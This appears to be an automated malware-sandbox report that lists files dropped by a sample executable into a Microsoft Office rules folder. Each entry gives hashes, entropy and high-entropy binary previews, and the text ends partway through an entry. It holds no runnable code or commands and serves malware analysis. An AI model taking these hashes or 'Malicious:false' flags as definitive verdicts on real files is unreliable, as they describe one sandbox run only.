                                                                                                                                      Preview:<?xml..Ve...Miv.....=M!..Ira3.<).....Q3bu.t.........x...C..._.....p_C..w.....Q.........].g.JcMP...A..0....[.."$b...U%.....9..T..H...M...........8....Z...I...6r8.\....w.......7k..ig.....y;i|.p.CO..~UbS.t3.w.W...H.........V....4. .p...)w....9."....is|....a`"9.|g5.....*y".....vv...[.......Z?.f6.........'.5#(......jbR;.}........`....u....5B..H..CK+M2p'<....._.v..}..F...0.....$..,........!/...r...B.S>%"....8._Q1..U....... I.)z.?vF.;....5Cd0Yr.:.|.Yx.G.\.....y./.e....k.[l..F..2...u.m..=m.>..TP.. T+.....t..5V+K~...Wa...>.j...VG...g.4.T`f_.v.E.6...s..SD.*...^xoD5o..Ab...z.j~...,d.N.j..WQ...E#*D.Kt...^...w...f..~. ......[.b.........3.f........G.-.r.......XJC7...6?..T..B.R.....g..Xh.$.E.2i..Y....C#.....*.*....NB....8#........u|5..>....Vk._.*.%......'...y.MBf...6K.|..[....2.v41O..HC...u.y6...(..A..K.-)(..k....`.J..Z:. :d.f..C0&Q..-s.f...s.P.hu^=.!kxt2&.j.GF...^..1|3K"t.}.b.T.zz..7fS.!.......2..../.....(.......9..EM1.?....Q.p.j..yk~I{AM.w.b...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule120600v4.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3314
                                                                                                                                      Entropy (8bit):7.946395422459189
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:A4qHV26/r6Ton8cSSzlgNe/DD+QLxZ6/ahBwqNC+A/5Z:U1TEo8cSXM/D5xoChps+AT
                                                                                                                                      MD5:DAD55FDB224B8BAA1415975BAFD265FE
                                                                                                                                      SHA1:83B0AE7BDCEEAC677E5F3496342E9A7BA638FF15
                                                                                                                                      SHA-256:86190196806628AE9AE40CAD7B53F19E4EB496141440FE4D8F972FC73675FE69
                                                                                                                                      SHA-512:4EDC0A60765973FF362B73F54EEC696E473D767A8C90B0CE8597614A736256D2EC02CF78B358D608C484E476E31F050C9945649AB457DACA6B1B715D0C0628C6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..<.. .O.&S....ZJ..{...W..M&...c2....D.VZ.<`...... .C..D.#..a(;....{......__+.....R..t.{.....;m@\ \.q..A..F\X..R..W.s....k...^.W.s.,.X..X.a:s.Km...e..w..C......t..5.$wxf{..4.FN....&........#k....M..yq8..d..w1.....C.]...!..b.H.t.9.F.Z......{..BI.....zoC....KM`.C`.....B>...NN.k..;..L.j...l..r..;P....iR+.vKA.9.9..%......X1.;.9"T....Q`..E.5=.9aE.W......;./]e...V.P.......4.ue....6aN..)P.I..0/.....F .}....b..D.2x.Ba`=.Ih.u..I8`..@...q..1P..u.....9.........'l<.X.g.>..:..,....F.s.H^T....r<C.Cl(.{k:51R.zt..ek....=.f.U,Sx}..j.?9.|r,(.E\q@6...."O..P..w...8.>...`..6....9.[zp&...}.Q.2.8...K~E..j.........B?...H...gh..k...u.3.....4...vqg...<.?.`.cV.Y.....n.s.f#..^.6=........C.v.......G].s.,......|*.9..<..<,....{.\.Ih",.....o.W,u.&% .p..V..|..*.i.....(Le..S,N.(.jWG:..f.&.P...sw......\..v....._..h..[.4..^..Kp.HE.~.x6..a.....V...(.|j.^B.c.UV.w#.G...\*...txp.j.~.xd8.a..r,..+..o.|"JC.?.[..z'=y..#...8&.......tV.........c..iYv`...Fx.....rT...pb.....EX.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule120608v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2494
                                                                                                                                      Entropy (8bit):7.912348757865498
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:quJ7BldIzTHaSu8j7Z2DPpTKhZnnR1pRcw0e2M53DLxInipjlD:PJhSuoFfpqJgEipJ
                                                                                                                                      MD5:42C53B78079E93A215288D4536096AF5
                                                                                                                                      SHA1:98B8386800568C09ABE7E27A09222EC4217331C1
                                                                                                                                      SHA-256:C18D11C978DC4B4F964940406B56441D2D1F8DC76C3FE7732A304388CB4F8827
                                                                                                                                      SHA-512:84636D3CC98B96766A51520D6CB14E80D71F73F370AD8031F57B1DCFBB28059FCBC6839A7B910A8D64EE5F1E6DAFACF50BBF5EC2B35E966D50237E195B542664
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?lY..z...K.vX...}fx.ct....6RQ,K.P.c.}.KN.u.8..I..L..'A..;H.......Xv.N%rX..U.>.o..+..N..G...S.k.V..L!.0...f.v.....!h.(...J.].A.b.'0..........^EB@6t....8.9..Z..R......]43.H...'g.Ikm|.e.A....9.....}.IA.l..q..a.~..Ko.;...`.b.J.....{.G.o....k.]y..(Q.e..w5h....v.d".+}....P..v..n...#...mf...O......>.....6]s..k...L..XD[...6H.~.y..+a.4...f.,ob..M......Y.*A..O.g.N.v.....n.D H.Hn..O.l...Qbc.lhC..Zh.B..3m&....r...<...aJ5DZ_z.O.^....0...O.#.[g....u.../.o.Q#s5.nr2.t...!...~...........D.....l.:...S../.L...a...#...\.|7d.m...z.u.k...[...o..-.8IM.+.A.9..'.5....Nx..]0..dO.RF...=.ug.?|A.z'.:Z..A...".;....?....43.??$@Lpwu^.v2..Z.....p.G.?..8I "_.....G.kf.......A..[...IKa...I.O\C......1$-..x....B5"{.e....{....c....'....`IXr..{:.......<J..D..t...:9.om..3.~.D..\..:..2...(V ..r.;k..V....{s(...1q..!.@H..3..m.Y........AR...N.(.,z...E......lc&..t<..z.......!.J.J`.|..#..t..RY..f.zx.q.......B.e.>..S.xxh.v..A.^...G.c...G..a.....W.S{9...Q1.b}...k.:.........uH.,AD.P

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule120609v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):742
                                                                                                                                      Entropy (8bit):7.692487856637745
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:0HdpD3NWDqlwTvv7USVOZIf1BSANcUQVQcjy+aStNYKOhzIxFDmYukIcii9a:0H3rNW2Kvv7HVOWVcUQLjy+aSzYZIxdy
                                                                                                                                      MD5:D1D65DBC753B568A5D0DCA70BFFF1C66
                                                                                                                                      SHA1:3EDD900EA81A641865B059182D29A27BAE4A3604
                                                                                                                                      SHA-256:D65C48A228DC2D6BA5E4D90A6F6C0F6ED17B309BBD39C63A3E331A4CACE67D74
                                                                                                                                      SHA-512:5CCAFA2D95B9E7BB7A13E81BB10C6143FCB002D99CC76A3D4920365635145A872665034CF1D087DFD5FB2C825371D8AE0461251BCE64D6D85A8E5F03F885E57F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.....?U.v........f*.\b.R....7}.23..Ba..\.K.b.S..J;.'.P./.F.X..W.6..0.`@~b=\. T.I..nh........G...I.W7'h5..A.KL...UF.+....H..6z....@........!.7v~..0...."..n...f."y.\..U..79x(&...u19#..%}.@...4.7..L..<....".w...pD..\C<...h.B.......q.L.,..../...F.......g..#.`(~"..X.\.g.r.4~...$..J..j8OZ...&....2..g.\.jS.HQ.GE_...$.+.7.\....?...F..& =....R.aH.1.$mJYGa...x.e.r.+K.o.1Y.a../......<h...= $..8.......F{..].koyl..@..a.L.Os!C..G......h.v..n..o.....{...<.n+.y. DA... ...F...X....U...\..*.B.,.`...Az.0.D9......I.....&.d3.;.C.;...R&V...0.Ba._rA."1u.........5..[._Y.{..-?.H.....r.3rm..b.....F^........Wr{.ap....Xl.4.......X.<g..#.!....J.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule224900v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):776
                                                                                                                                      Entropy (8bit):7.734976691585099
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:yfy/pn1fzZE8D6KCIYnnDeNWZzvptLoRDcdqbD:b/pn1fNEmWn6NOpuCeD
                                                                                                                                      MD5:B7ADD37FF26BB70A2B805ECEE3390CC1
                                                                                                                                      SHA1:2004766E9B8E2B55ACD32C715C9F8EAFA429DEB3
                                                                                                                                      SHA-256:260F54E8BF1E315C169A85F07D3971A8997B1256138026A4CAA17E2C255C43BD
                                                                                                                                      SHA-512:66B7AC222C94A346763B7FD6BB6ED0C1D057519832CE958F8A90B57E599AA6BA07898882F1432E354EF49012DB673CF3E46CB807CD70BA17EEECAA57CFC01BB7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.u.Q.Tg.f~....n.E.....2J..uY...c.24.l..jf\......*..L..H~7*,...bF..V.......9....{..{...W=DgBQ..!o!..(<C....I..........6h.-.j..*..J.1A...c..*.!.STX....o.8.x{.rZP.f..^.\.%.9..........N.2.....P...Ri.....4.O..HB'..r...;D...h.?..<...l.k}.Iq.-..*....u....'......Q.9.A.L.b1'.N.U.8...XrE]@K\2..\..8....W..".H[...t;....M3....Y.....s.S.\.5...3..<y....+...p..j...m...l...:...I.{...v.....\..F.5hU....}GrY.O...W9......c.f....".u....K@...=.p/F&Mx..v.3.I....<..v#.M.zN]g*..P..n,....;;..qx.E..&.L...).N..~|......=......g;o.....B....E.;...}.$Kd.....@r..ez.&..-..AGj.. .A~^5.o..Q..f..Q.B]....O....S(....f.6.#..i.D.......I:-.b......]...4<..tC"-.!@.B.B....n...]N....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule224901v11.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2617
                                                                                                                                      Entropy (8bit):7.929978517442806
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:yDa0E2J2atdazYcPgq2Ajd3/JLodvpX7brYoH+p3uP5pD:i7J2sa0cPgN6dP5ExzFH86
                                                                                                                                      MD5:EF81A42AA435BBEFE9B098C37F951644
                                                                                                                                      SHA1:6589BF70A37CD4411BEA5FB43B65AFB3C4AEBD51
                                                                                                                                      SHA-256:1B48F266B99DC1314A261CA532C78D9B9DEF9537EF7A9B81733E4EEF9FDD106C
                                                                                                                                      SHA-512:5F1262B64FC16C111122175768F48ACC1B257DC552754D6B00184E9D3FEFFBAAB17F43E364C55AD0F981160A53F1236F2A9EBFFD5D21728DC34597FAB2A92619
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...#}..S..F8.7.U/.U2.....L.77.....-<4M...D.]...':.......j...~..u...6.8.W.Y.1..R\v....3.f...e.Pk.,IMq...~.W.$M.+....0..|....~]p.oRO...i.q%.k"...w...T|.u.+{..qh.....p).Ef$C./.[."....../.........H.....~..'..l..~O..4y....m,)..V...1...n......._.V.nw....HeW.N.V6..P..Q....n.......(W.4%.T..Q...].::=-(.w-...o..Pv....O6J...V.X.Z......E_l.....p..#.X..[.....:w..q.............m)..8.hI/..........)S`c.U..Jj8....A..j...X....q....E.%[Hf.....l......L..> p.dr...p..t..f..d?.x._.....?...I......%o....aA.mK.%i\.o~..8.}..MZ...(.....D.9F.....,...T{.zg<.lApN...Eu@L...G...q...+|& ..Sm.<.......yd.@...\&.>9.X...gb.B..Y..W0......oL`.,.d....L.....D.....%..4.j.......1!..>......,y.t. s.**....%.yLo.......i..P..e)M..F~w6...1.....K....m.i..BO..e.sC#.W\..Y....]/?3T...O....S.f..-..7......?..im..p....."?}.M..!.[....\..|...""../.~.+..\...}...]GK(...[......1uK5.o...l.;?.n.....z.+.U.(.i.J..?L......#...de.,B.-.po...am.....t.-=.O......$..w~jC ..a..@.."./a.%".eI.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule224902v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):783
                                                                                                                                      Entropy (8bit):7.720169174277318
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:AWQYAYjQh0OjEYzQifF5izCAkPYqJ5I9TcKajjasP0u+tleXHinqd3I8TGVKDcjp:vQ/TBPYUO2Ki2liCnA48+KDwIBQbD
                                                                                                                                      MD5:99B9946B81539BFE3D17D1A9F3F7073B
                                                                                                                                      SHA1:F600DAB306FDBFF6434F41130FD94C0EA4F4537C
                                                                                                                                      SHA-256:9C075ACD3260324129D3DF574BFAB23BAED578ED9F1BA1A12BD89187CD5A5DF1
                                                                                                                                      SHA-512:58ADE8F41C2B299F345BBC53E65CA70884F96B8E9C3E8BF73B99087F6BC4B9C9DF4F68E408597A9A0637F440BBDA7E9DA1E20F23EDD7B97CA92DD5A5DF18D24F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...YD...1..........`....;.p0.c.Q.E.Y...7bm......Z....kR..&m...w.T..V=e.N..NZ.=.&E...&I...?...y}.y....k0|R.Dj.b...\........Bw7Ay.[.&N.......T...^..U.7.{Zx......xm.<.2.....z..\..Y*..0.&8../1.J.........\.R~..5.o.....F.....wh.._.R..W|..X}.p..|.f...yCA..}......D..,X_@..zc9.....*l...A...........S..#hUg.......q.zM.oLa.b..B....N..8.j<^<. .-......l..y....wp.........*......<....!2Y.L.0@.p&...(.;u.3.s..!..o.=.......wu..Y<c...v...{.....6.m.....L.(..]...hI..<.{oK..z.Sn-E.d.l..rd...5..v .!...s....J$.~C5k..h20wJ.>..P..FP'...W...K%.dcP.e+U>....%+..g.k..D...G.A7Z..|/?..:.yXEL{.......Ih...;.3..<h...)<V.b...3.......t.Sa...Q@..w.....bF;V.M.G.....7j....s.\......2...=FbN......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule226009v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):859
                                                                                                                                      Entropy (8bit):7.786610485692527
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:0eXBv454dU7lsYkLqp82L/1OpMzvIWCUueZbD:0eXjdUJkLqp8e/1OGzvInKZD
                                                                                                                                      MD5:5E9CB21D11CD9AF17A17B9D0BF434724
                                                                                                                                      SHA1:23C9B208A1F39430A487CD4C501BC91A29D5AD13
                                                                                                                                      SHA-256:050DFE2396410050390725098B7AC375A65405BE9E5D8BC7B49B71665C2C5432
                                                                                                                                      SHA-512:66B41A7F1FC01E206DF7BBE2489BAF92C47045C47F775477A549606A327871D637D89FD7C8A9078ACB460A44397FC88D4C959A42D32D049E23D6CBCCDFDA8A76
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlFu.....C....l....+`...E./..=kG.t.]&.Pt.o..?#C.f.....0..0..#.k.....R...#.2...oT...\?...2.3.^.N.^}P....G/.J'k:..b(.)....J...yH.0Y5..|[.O~D......l.&.P.,...........*)...I.).YM..p.'q*.Qh...y,.....3.r.W.s.M..?....J3/.\.....%...W.@..W.8...2X.E.K.O:.C.Y<..?.n[]Xmh..R.m.N..6p81A...3.f.:.I...'^...0Im..,p.=+A.`..2.C.[...................o.T...TX#.s}..+._....[..k.U........_...<..2."3..#..'.kn.SE....I......F..`&.....e.^5.Q..!.cO...G-.$W....`.......Zu...0k.._/..wSA`..t.....1......MA._2 ......>.*.....{..,O...K.../....5.<..)u\.T...).my}D.C>....rJ..........Apm@...)x....%.......-K..H.......6.....y/AT...R....vt0.jU*Q-.VM.B.|.1vb.X@..".........|..a.....(.{..+2"..?f!B.UH@.A...D..8.......b....Ew.k....*.....TA.=}M.g..t.........z;H.......@..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230104v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3147
                                                                                                                                      Entropy (8bit):7.934256288765341
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:4XnPQZknJdwicPKYjstlO3Wl62oeR4xiVb6O6RxuboPh8jduyCpfon1PHzZD:2PJdwicpjj3W9oeixiVqxueW5wK1R
                                                                                                                                      MD5:3B2DFF2AE86601D6CC02A79DC64D492F
                                                                                                                                      SHA1:82B26E56162B54B18D5F65D00CFFAF3AB8780A71
                                                                                                                                      SHA-256:3BE4740ABF537C0ED15E51BE0F6D40F8CACEFE310DEC254A8FDD63F3165F0BFB
                                                                                                                                      SHA-512:CC4407EA2632E9BB101EC3BB1BE50AC697D192A9D2396DBAD48E95126298F0A72CC6796E08B37B9619FA721D992EF6BC5CDC61BAAE6224EA46EB06E13F86B608
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....k._<.8.5...Q.!.C.PS(..R....4..%..|.y..:..wh....Dxt.v.x...,.j..m.xV.t.~...N.$.M....%7....nT.....9....K...,.K<C.1..+.*Z.o.../o......n...`.I...Y*.,.x...p$.d!.W..r.i8Z7.7h..bT..U.v....7....X....._.V.cs..5.g.u.i.^fy.~...a...v-....*.....5........u."..a.=..l.+......r..h\...."...C5..c.6..K.$.m..XVc.}?....*.*KXWEs.fh.......`.z.m..,8......o@.?b....r.v...2Ei.....[....y...'..b...eC.!/.u}.k..u!....}.......+...a_=...P.Qi...%......N.P....H$...^h3q..T.}..S.CW.-f.96.D.Qd..+...._...s+V2..6%.,.E.f.k..6....2.Z...-J../...?.6>..........tg)...U...H...9.m.....P.....~.F..5.:,...(....lj...0.E.>m......b/6c..x..P....l.u..../h..........3.Uh......N..D.q.6y.R.O..O.. ....{0.B...7..m.H.WE/M....e.+..ZF../.G./...|.3d>.%8....9........s.@g.R.e...#I...H....BU.h.IT..8..>6....,.H....bN..$...X.....s...w<...D..S.a.O...V.T.F.LE.@.a...s.{.,j!..gW....J... N..+z.....~..q.z..e..J...8.P.0,...+..L..3T.G.j.N0[.=...\..E..O..z^z...!.X.ZF.<..b.`-...~:...AC..5.2...u.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230157v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2237
                                                                                                                                      Entropy (8bit):7.913576988699877
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:GQao4kfGgpUkBnMs8WUEf8P2fp+ScRxvNBgXF+wDRtR2kD:G3o4ibUmP8Hg8Ap+p1BG1ltR2w
                                                                                                                                      MD5:A5CAA6B480116598A930599C4521A32E
                                                                                                                                      SHA1:D8A4CB514861C77ADA14C7D15394BF39D97B3CE6
                                                                                                                                      SHA-256:9E42213BEDA0D9377DEB1C7248768C897D78654608424EA0E304D655AE32C5AC
                                                                                                                                      SHA-512:52DBB6478727C82079090CE30FAC2AE62BB338EE4190C6E564A1E47768686E52A9064E24366C5BFCDC8DE6C2F14E49775EB26D368FFC122A4FEB61D0660850EA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmln.%.9M./V.#..K*.k..V...M.[j..22.[...........M..0(....nn.2s.(...yDk'....H..\O......&.E.ogg..V.#.....e...+...).._.....C....C.x.:`z..UR._...F5wI}A.{jg..v@4Y..Il*.q6`.....I...;]9'..ig....-.c..^$......jf..Ra..dX ..L....q.nI..z.9. .-*2...C...;Pd.F.=n7.!/<,L...r.."....>.Y.&. K..c.{nl.9t?.( 9...s'...2.B.....6.d....d:|nFA....3._.>].r...b...n_IQA.V.E..f..y;z V.3`..jw.7M...8..A......s.H2+..E.....>.]...5aji. #.j.........Y.c..d.q....2.k. m5....+...I?]..=...._..g..n.....,@.@..P.h.....|...r..ps...sm.Oo..5Zyk(h..Z..r...{....^e.....(....=6.m.....7....D.Z.1..q.F.1.3.Q....e*6.h"....HG.uH.d)....(W..6J&.w....*.J..,...m@......8....c8...l..(.o9?3tL....q.w}V.m.R.1:%..........!....X/...p.pR.1iL....= .V.&.8.v.#L.8../_.\m.7j?.....\.....H.:.f...%WS.ND._9.NQ..K.......#.p3iL."..i|.'A.g}..=j.L....\.>W.m.............{(Gs.{....b.-..=[.@l...=....)...^QL..9..8:i.L.|....U..qE.&...FP.%i....^.^.j.....Ne.m.S;r....$<.\Rj....0..Ieh...P..'.-..mSG...Q..2w_.......v.-...w..X..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230158v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1924
                                                                                                                                      Entropy (8bit):7.916844762646904
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:mEsaDmj5h1iaiLg4smC6GZiFgBBte2FTw6lAf+8WDiDN7rXcsRWWg8KC+X3cc/SP:rtaiM7m4ZiuOwTjYDWMxXZ+3ccuHUGXD
                                                                                                                                      MD5:D200D282713358DF1702528FF6C0214C
                                                                                                                                      SHA1:638B715015AD2638E14AC2D802A792ED31D919C7
                                                                                                                                      SHA-256:BA373FA148F896A8202F0737E2C9FC3BBADEB680E1470D8B8CFD5D809880818E
                                                                                                                                      SHA-512:564C0FB894FFF7B85B289AF9E3987EAE76920C7E3F72E8596F5A6B7063D556C3D819DCFE3C401F1053A59EDCEF94D9CFCC11853D3CB3D2794FC9A623B6BD65BE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.!abj1..o/l......vDF."B.Z..Ef{.."l.Q...`.L...."..1.s..E.C%O.{S..AS..O.m.}\..9.-.a...c......A......kRm.-. .0*.F.......5-D. ..u...iX..-7.{..:.Q<......Y...6+...3..n..]...)......{.A...6|....eNR6DR.s.:..N.D...^._....&.E..................!g...[......Z.~.A}Dc.3..v....Cm...........]]Y.w:F1w...dH.....).+...5..Y...7./../.j..//.....&^.x.?.h.g..:.zx/..:X....[.(ScV!..,..5+....:...t.w.....v.....n......Z.|.5!9..|..b w./.".Z........n....9("W.......q....1.....|..:.w.N..b5;.3'...vL..3.,..E.;..... m....~...}d..1....3LaJ......u@...~`..^OH....0.I.o.v..... ..;t.!B<.G...T.?.m..[]x...[U..u..\...x...m..o..5_....m.T...o<......Zg>ls...q..5..... ..dW.@...{6j..Ot.!....A.....@..A..m=.MF6.&.-.g.b..imH.MU@n.os7.....T.v...vM.Q.gW.9...U....["..~..e.I#0..O.....@....F..+(.....Q.......s.?.[.j.+..n..~?.b.P../c..NQ%?....(.d......5.................h....hpK.y&..........<.`.>......]S.....Sm.(...\.;...=.Y}...9.r.l......,T.TE.?..........)9.r..Ah......#.Dy:..<.n..|....._.X2.1..O

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230162v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2020
                                                                                                                                      Entropy (8bit):7.914121788764225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:KZIBYmzSu3AqeIx3lOexS5Ee0Ie9GFoeHz4QXZmxv4k74urD:kIBP4qe23lO8PPGFr4hv4k74u
                                                                                                                                      MD5:ECB43A789E78E300F2B0D92E4B8D7796
                                                                                                                                      SHA1:D28F2A6749BB15E81FBE1367ADA51FEE0D6134ED
                                                                                                                                      SHA-256:3B78EFB49D712B8D6C6BF0842161090811D6F028037C62B1962AAC8F485AE75F
                                                                                                                                      SHA-512:EBDE174E89F5060C2C8D2DF9AE61B2B6A014E58FAEFA5BCC8FBBB5F2B06816F2D29F3E40877496F83454FADD16A6DB28F34D60244514A5FFB23905F231B4E048
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..T.....1.I...i.!.So>/..%........=.p.e..2.w.G.!.j.@......4..X.6.t...I..:...'...I./6..s~hW.. ..,..Ctf$..6.q..Rs.q1p.3.n..I....d?...W.......-4.O.....".g.....7IP!.;.<....i..........J....l..A$..H.e.Gp....x..J.l}Cq.lw..o...m...F.9...U.........:@.@.*k...5.:...q.P..1.Q..t...U._.q..$.......%#........d....1.......lp..,:....DB....GM.[l..-6.KR./]..d..b+M..!%..7f<P\...4..B:(.%.....Zg....`.......<...z`.,......jx.z../}..i..k$...K.}..`......p\zqZ.KA.....f5..YM.;..n.O.,.XnD.~...+Y..A.m.f<.U..:.......B.I.....#{c..~.Y.N.f..(....L..q.m&R+.....*!M.._.....B....|...q..#R...G|.fr..E..Ip.;R.2k);..E.^uq...j.>`h."..n.?....r.e..f...d.O.Q.. ..M.......K..n.d2...4.....y?.v....D...]...0d.C.."..N.v.n....3.9..z.H.a..3<..H..F..xt1......}.....B..ps.<M..G5a..o.:q...V....O...\.v. .o.......k...G.,u....nh....Z.....5.G..fE..........r^..~=...,d_....u....Q....'..f`X...UN........}Q[sU.uV.....].2G.7?J......N.........|`EI.D.+)/...a.....Y?&.;~.3.{..;....".nV(ByQ..zYU.8W..[.G..g

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230164v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1186
                                                                                                                                      Entropy (8bit):7.810897401945511
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:IzsXC6vNviDMYbF6gwUssOTuh8bYxAgyS0w0VtIXch0F0TJfFr/uTPvRHykBH60M:82Ny6gysOZbYxAYA0F0TJtjw8kp60of1
                                                                                                                                      MD5:991369DB58ADE93B294EB74802E1BAF4
                                                                                                                                      SHA1:2BDE284C4DF708025C1459BFA30FDEF2C0A02AF3
                                                                                                                                      SHA-256:833B35533867195574044B5B6729016D8C7A43993C8CC47B75D09C172251CE48
                                                                                                                                      SHA-512:312882BF51D739F9BD49425D2394FC0CA34221C594558F2E8369A829F62B2C0DB2008DF47470996FB45D8495F52A7654A92057F9196DBF71C95CFB16C8B2B92E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml5..'.s.~......./.e.J..0.B.2.'@+../Wd..9.l.;...U.....o).S.0j...xT.L.i...X.xC...*.0..=...4.]I.}..V...&.......e..'....]..X.z>.F.|.5.+.0.{.&va.zHLI..`.|.1..i4....>_.......=.Q.V/.....I.J.d.p.Q.b......6.a.|voKRd..{..5......gk...A.R.0e.|cW.#0c.`...;..S.F../.hL~u..].{..!.@..|..>.zK..Mo7.2...I_g1.=8..[W......./3....U.....!&.8u.sT......&o....AcZ..@...x+2.@6.;..v......1..8.../.....111.2.....b..h...a.x0"..<.2............,..D......|.gu<......v..D|......RiH.6).JK&......A.I......8....9t...BP.7....Q..xf.._u....IZ..=..5...V=.L+.UL[w)..B.b...|....U..7.....4....)...'.}.z..+...j....!....>S...@........^...}...F&.1.3,jAaQ... N......g.!./.<..;..0.1......i/...........Vd..V_.... .r.h......J..h.i Z'Z.s....#.._..m..WX.e...P.3d<..[[j..,...st...C..&...-y..>...)..lM......z.;$3L.............._..w.(.X..........O@Q..;.dB...#.$\.[....al...(......W...1...H.....n........>0i.B(...2...,.._..1..J.....[...X.7.>...(3]t.Y:T..|...W..._N:a..8.kD......{FlV..5."R.Od;.....1..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230165v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1182
                                                                                                                                      Entropy (8bit):7.835903147830451
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:0ok6wdE4pHAxQgI2sysBgkPJQBVJ3YswNohWbD:0ok1dJgLI2uPJQ5RwNMED
                                                                                                                                      MD5:5DB718E8AD11031F63194BB6EA68AD1B
                                                                                                                                      SHA1:42FFFA5BFC43CEB40D3EEC8A7C7FED8A7CA34AD0
                                                                                                                                      SHA-256:E6E36FC31D809EB00F7FCB732FB8411D9A2E285CDC56BE0EBC36B44B267DA64B
